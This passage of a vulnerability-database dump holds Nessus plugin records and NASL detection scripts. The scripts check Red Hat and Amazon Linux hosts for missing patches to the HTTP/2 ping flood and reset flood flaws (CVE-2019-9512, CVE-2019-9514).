= NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'containernetworking-plugins');\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:27:32", "description": "An update for go-toolset-1.11 and go-toolset-1.11-golang is now available for Red Hat Developer Tools.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGo Toolset provides the Go programming language tools and libraries.\nGo is alternatively known as golang.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-11T00:00:00", "type": "nessus", "title": "RHEL 7 : go-toolset-1.11 and go-toolset-1.11-golang (RHSA-2019:2682) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11", "p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-build", "p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang", "p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-bin", "p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-docs", "p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-misc", "p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-race", "p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-src", "p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-tests", "p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-runtime", "p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-scldevel", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2019-2682.NASL", "href": "https://www.tenable.com/plugins/nessus/128659", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:2682. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128659);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:2682\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 7 : go-toolset-1.11 and go-toolset-1.11-golang (RHSA-2019:2682) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for go-toolset-1.11 and go-toolset-1.11-golang is now\navailable for Red Hat Developer Tools.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGo Toolset provides the Go programming language tools and libraries.\nGo is alternatively known as golang.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:2682\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-misc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-race\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-src\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-golang-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:go-toolset-1.11-scldevel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:2682\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"aarch64\", reference:\"go-toolset-1.11-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"go-toolset-1.11-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"go-toolset-1.11-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"aarch64\", reference:\"go-toolset-1.11-build-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"go-toolset-1.11-build-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"go-toolset-1.11-build-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"aarch64\", reference:\"go-toolset-1.11-golang-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"go-toolset-1.11-golang-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"go-toolset-1.11-golang-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"aarch64\", reference:\"go-toolset-1.11-golang-bin-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"go-toolset-1.11-golang-bin-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"go-toolset-1.11-golang-bin-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"go-toolset-1.11-golang-docs-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"aarch64\", reference:\"go-toolset-1.11-golang-misc-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"go-toolset-1.11-golang-misc-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"go-toolset-1.11-golang-misc-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"go-toolset-1.11-golang-race-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"aarch64\", reference:\"go-toolset-1.11-golang-src-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"go-toolset-1.11-golang-src-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"go-toolset-1.11-golang-src-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"aarch64\", reference:\"go-toolset-1.11-golang-tests-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"go-toolset-1.11-golang-tests-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"go-toolset-1.11-golang-tests-1.11.13-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"aarch64\", reference:\"go-toolset-1.11-runtime-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"go-toolset-1.11-runtime-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"go-toolset-1.11-runtime-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"aarch64\", reference:\"go-toolset-1.11-scldevel-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"go-toolset-1.11-scldevel-1.11.13-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"go-toolset-1.11-scldevel-1.11.13-1.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"go-toolset-1.11 / go-toolset-1.11-build / go-toolset-1.11-golang / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:23:00", "description": "Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both. (CVE-2019-9512)\n\nSome HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both. (CVE-2019-9514)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-08-28T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : golang (ALAS-2019-1272) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:golang", "p-cpe:/a:amazon:linux:golang-bin", "p-cpe:/a:amazon:linux:golang-docs", "p-cpe:/a:amazon:linux:golang-misc", "p-cpe:/a:amazon:linux:golang-src", "p-cpe:/a:amazon:linux:golang-tests", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2019-1272.NASL", "href": "https://www.tenable.com/plugins/nessus/128286", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2019-1272.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128286);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"ALAS\", value:\"2019-1272\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Amazon Linux 2 : golang (ALAS-2019-1272) (Ping Flood) (Reset Flood)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Some HTTP/2 implementations are vulnerable to ping floods, potentially\nleading to a denial of service. The attacker sends continual pings to\nan HTTP/2 peer, causing the peer to build an internal queue of\nresponses. Depending on how efficiently this data is queued, this can\nconsume excess CPU, memory, or both. (CVE-2019-9512)\n\nSome HTTP/2 implementations are vulnerable to a reset flood,\npotentially leading to a denial of service. The attacker opens a\nnumber of streams and sends an invalid request over each stream that\nshould solicit a stream of RST_STREAM frames from the peer. Depending\non how the peer queues the RST_STREAM frames, this can consume excess\nmemory, CPU, or both. (CVE-2019-9514)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2019-1272.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update golang' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-misc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-src\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"golang-1.9.4-3.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"golang-bin-1.9.4-3.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"golang-docs-1.9.4-3.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"golang-misc-1.9.4-3.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"golang-src-1.9.4-3.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"golang-tests-1.9.4-3.amzn2.0.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"golang / golang-bin / golang-docs / golang-misc / golang-src / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-12T15:31:26", "description": "An update for the container-tools:1.0 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-18T00:00:00", "type": "nessus", "title": "RHEL 8 : container-tools:1.0 (RHSA-2019:4273) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:buildah", "p-cpe:/a:redhat:enterprise_linux:buildah-debugsource", "p-cpe:/a:redhat:enterprise_linux:container-selinux", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debugsource", "p-cpe:/a:redhat:enterprise_linux:containers-common", "p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs", "p-cpe:/a:redhat:enterprise_linux:fuse-overlayfs-debugsource", "p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook", "p-cpe:/a:redhat:enterprise_linux:oci-systemd-hook-debugsource", "p-cpe:/a:redhat:enterprise_linux:oci-umount", "p-cpe:/a:redhat:enterprise_linux:oci-umount-debugsource", "p-cpe:/a:redhat:enterprise_linux:podman", "p-cpe:/a:redhat:enterprise_linux:podman-debugsource", "p-cpe:/a:redhat:enterprise_linux:podman-docker", "p-cpe:/a:redhat:enterprise_linux:runc", "p-cpe:/a:redhat:enterprise_linux:runc-debugsource", "p-cpe:/a:redhat:enterprise_linux:skopeo", "p-cpe:/a:redhat:enterprise_linux:skopeo-debugsource", "p-cpe:/a:redhat:enterprise_linux:slirp4netns", "p-cpe:/a:redhat:enterprise_linux:slirp4netns-debugsource", "cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:enterprise_linux:8.1"], "id": "REDHAT-RHSA-2019-4273.NASL", "href": "https://www.tenable.com/plugins/nessus/132235", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:4273. The text\n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132235);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:4273\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 8 : container-tools:1.0 (RHSA-2019:4273) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for the container-tools:1.0 module is now available for Red\nHat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe container-tools module contains tools for working with containers,\nnotably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:4273\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9512\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 